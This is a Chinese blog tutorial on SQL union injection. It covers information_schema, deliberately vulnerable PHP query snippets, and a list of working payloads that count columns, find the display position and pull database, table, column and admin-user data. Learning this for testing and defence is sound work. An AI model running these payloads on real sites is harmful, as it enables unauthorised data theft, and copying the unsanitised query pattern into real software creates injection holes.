SQL_les0/基础知识/联合注入常用语句与相关技巧

最新推荐文章于 2024-06-02 14:54:06 发布
最新推荐文章于 2024-06-02 14:54:06 发布
阅读量298 收藏
点赞数
分类专栏: SQL注入 文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45118086/article/details/114993845
版权

SQL注入

一种针对数据库的攻击方式

危害:数据被破坏、数据被篡改

原理:攻击者通过构造不同的SQL语句来实现对数据库的操作

常见数据库

Oracle

SQL Server

DB2

PostgreSQL

MySQL

Access

使用SQL语句对关系型数据库进行操作

系统库:information_schema

schemat表:存放所有的库名(字段名为SCHEMA_NAME)

tables:存放表的信息,TABLE_NAME字段存放表名,TABLE_SCHEMA存放表所属的库名

columns:存放字段的相关信息(TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME)

联合注入的补齐操作

select * from table1 union select *,1 from table2

table1有四个字段,table2有三个字段,联合查询的前后两个语句应当具有相同的字段数。

select 1,2,3

直接显示123

database()函数

显示数据库的名称

select database()

结果将显示当前的库名

SQL注入种类

  • 联合注入
  • POST注入/HEAD注入
  • 盲注
  • 宽字节注入

Access注入:Cookie注入、偏移注入

MySQL注入:DNS注入、反弹注入

Oracle注入:报错注入

一般注入步骤

1、判断注入点

2、判断字段数

3、判断回显点

4、查询相关内容

联合注入

判断注入点

1、判断是否与数据库存在交互动作

2、判断是否可能存在注入点

判断方法:构造SQL语句,看一下是否能够进入数据库

比如使用sleep()函数,会导致页面不停的刷新

数字型注入

值以数字的形式传入SQL语句,无需使用单引号进行包裹

$con=mysqli_connect("localhost","root","maoshe");
mysqli_query($con,"set name utf6");
$rs=mysqli_query($con,"SELECT * FROM 'news' WHERE 'id'=$id;");
$row=mysqli_fetch_row($rs);
echo $row[1];

字符型注入

值以字符的形式传入SQL语句,需要使用单引号进行包裹

$con=mysqli_connect("localhost","root","maoshe");
mysqli_query($con,"set name utf6");
$rs=mysqli_query($con,"SELECT * FROM 'news' WHERE 'id'='$id';");
$row=mysqli_fetch_row($rs);
echo $row[1];

逃脱单引号:

url/id=1'(此单引号用于闭合前面的单引号) and 1=1 #/%23(用于将之后的字符串注释掉,或者使用-- 空格//--+)

联合查询步骤

1、判断前表的字段数,使用order by,order by 1、order by 2等等,直至页面不正常显示,边可以得知表的字段数

2、联合查询的结果可能会有多行,但是页面仅仅只能够显示一行内容,可以通过limit 1,1来显示第二行的内容,或者使得第一行的内容无法显示(条件为假)

比如拿下数据库名:

url/id=1.999 union select 1,database()

或者

url/id=1 union select 1,database() limit 1,1

一些常用的语句

  • 猜询数据库的版本

and 1=2 union select 1,version()

  • 猜询数据库

and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1

  • 猜询表名

and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 1,1

and 1=2 union select 1,table_name from information_schema.tables where table_schema='库名' limit 1,1

  • 查询字段名

and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin limit 0,1'

  • 查询字段内容

and 1=2 union select 1,username from admin
实战见:MySQL联合注入实战

Access联合注入/cookie注入

Moplit
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入之union联合注入
kingdring的博客
11-14 1万+
ps:21号祥云杯,为了避免连到都签不上,临时抱一波佛脚。 声明1:本文章使用的数据皆为官网公示,为保护信息已做打码 声明2:此系列文章仅用于CTF学习及信息安全防御技术,建议读者应用之前在 本地 搭建数据库或靶场等实践环境,在公网使用相关技术前请通读 《网络安全法》 union联合注入 上一篇大致说了sql注入的一些基本原理,这一篇说一说union的相关内容 联合查询 啥是联合查询 select a from b union select c from d where e; 大致就是这样 显然union
discuz 查询语句安全威胁[Query] SELECT /*!40001 SQL_CACHE */的解决方法
09-28
Error messages:[Type] 查询语句安全威胁[Query] SELECT /*!40001 SQL_CACHE */ * FROM common_syscache WHER
安全中级11:sql注入+联合、报错、时间盲注+sqlmap使用
weixin_62870380的博客
07-02 3429
sql注入的原理和流程,以及联合注入、报错注入、时间盲注、布尔盲注以及sqlmap使用。
SQL注入之union 联合注入
weixin_53711701的博客
01-16 4178
SQL注入之union联合注入
SQL注入之union联合注入
hobby云说
06-12 3523
特别申明 本文章仅供学习使用,其余利用本文章内容进行的任何行为与本人无关!做任何渗透操作前,请一定三思,做个遵纪守法的好公民! 简介 在初见SQL注入提到三种分类方式,其中一个是根据注入是否有回显来进行分类,本文将详细讲解有回显这类的注入方式。有有回显的注入,顾名思义,程序会将后端执行SQL查询语句的结果,返回显到页面中,通过各种巧妙的方式让各种你想要知道的关键信息显示在页面中。有回显的注入常见的有联合注入和报错注入,本文将详细讲解union联合注入。 正文 ...
SQL注入-联合注入
热门推荐
wangyuxiang946的博客
06-26 1万+
页面有显示位时 , 可用联合注入 本次以 SQLi 第一关为案例 第一步,判断注入类型 参数中添加 单引号 ' , 如果报错,说明后端没有过滤参数 , 即 存在注入 ?id=1' 从数据库的报错中我们可得知 , 最外边的一对单引号是错误提示自带的,我们不用管 我们输入的1 , 两边的一对单引号 , 是SQL拼接参数时使用的 而1 右边的单引号 , 是我们自己输入的 也就是说 , 后台SQL中拼接参数时 , 使用的是单引号 , 固 注入点为 单引号字符串型 第二步,获取字段数
SQL 注入漏洞(五)union 联合注入
不秃头的程序Yang
06-11 1871
1、联合查询的错误方式 4、联合查询注入获取敏感信息 6、通过 information_schema 获取表
SQL_Sever数据库常用语句大全.zip
06-18
SQL_Sever数据库常用语句大全.zip SQL_Sever数据库常用命令大全.zip power函数获取数值的n次方 round函数保留指定位数小数点(指定位数后四舍五入) sign函数判断正数负数和零 sqrt平方根函数 convert转换数据类型...
sqlcmd.rar_SQL_Server_C/C++_
08-11
Sql注入SA权限CMD终结者+C源码。请果断下载
PL/SQL编程基础知识
11-30
PL/SQL 编程基础知识详解,PL/SQL 包含过程化语句SQL语句数据操作和查询语句被包含在PL/SQL代码的程序单元中(PL/SQL块),经过逻辑判断、循环等操作完成复杂的功能或者计算.。
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
如何mysql数据导入到mongdb
codemami的博客
05-30 1117
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
书籍学习|基于SprinBoot+vue的书籍学习平台(源码+数据库+文档)
JIngJaneIL的博客
05-28 1187
首先,论文一开始便是清楚的论述了平台的研究内容。其次,剖析平台需求分析,弄明白“做什么”,分析包括业务分析和业务流程的分析以及用例分析,更进一步明确平台的需求。然后在明白了平台的需求基础上需要进一步地设计平台,主要包罗软件架构模式、整体功能模块、数据库设计。本项目软件架构选择B/S模式和java技术,总体功能模块运用自顶向下的分层思想。再然后就是实现平台并进行代码编写实现功能。论文的最后章节总结一下自己完成本论文和开发本项目的心得和总结。通过书籍学习平台将会使书籍学习各个方面的工作效率带来实质性的提升。
oracle中的INTERVAL函数学习总结
weixin_42821740的博客
05-30 451
简单学懂interval函数
行列视(RCV)能否在指定时间生成报表数据?
2401_83701843的博客
05-30 162
需要注意的是,要实现指定时间生成报表数据的功能,用户需要确保行列视(RCV)系统已经正确配置并连接了相应的数据源,同时还需要根据实际需求进行报表格式和计算逻辑的设置。此外,系统的稳定性和性能也是影响报表生成的重要因素,用户需要确保系统能够正常运行并处理大量的数据。其次,关于指定时间生成报表数据的需求,用户可以通过行列视(RCV)的定时任务功能来实现。综上所述,行列视(RCV)具备在指定时间生成报表数据的能力,但具体实现方式需要根据系统的配置和使用需求来确定。
chat4-Server端保存聊天消息到mysql
最新发布
gulanga5的博客
06-02 460
本文档描述了Server端接收到Client的消息并转发给所有客户端或私发给某个客户端同时将聊天消息保存到mysql服务端为当前客户端创建一个线程,此线程接收当前客户端的消息并转发给所有客户端或私发给某个客户端同时将聊天消息保存到mysql本文档主要总结了将聊天消息保存到mysql!!!),;import;import;import;/**用druid连接池来连接数据库的工具类*/DBUtil。
SpringBoot 的 Java 代码配置(二)
xiaotu的博客
05-29 1172
因此,如果使用 HikariCP 只用声明你要用它就行,而声明要使用 Druid,你需要自己指定所使用的版本。上面的 DruidDataSource ,我们为其属性赋值时,它的四个属性都是简单类型属性,因此十分容易处理。但是,在 Spring 的容器中,Java Bean 可能会存在引用。在上面的 Druid 的配置中,数据库连接的四大属性值是在代码中『写死』的。而在 Java 代码配置中,通过 @Bean 方法的入参来表达 Bean 之间的引用关系。,所以,我们可以直接将自定义的配置项写在。
翻译SET SQL_NOTES=@OLD_SQL_NOTES */;
04-05
SET SQL_NOTES=@OLD_SQL_NOTES */; 这是一个MySQL的命令,其作用是将当前会话中的SQL_NOTES设置为先前保存的值。SQL_NOTES是一个系统变量,用于指定是否在执行语句时输出注释信息。该命令的作用是还原SQL_NOTES的值,以确保在执行其他语句时不会受到该变量的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值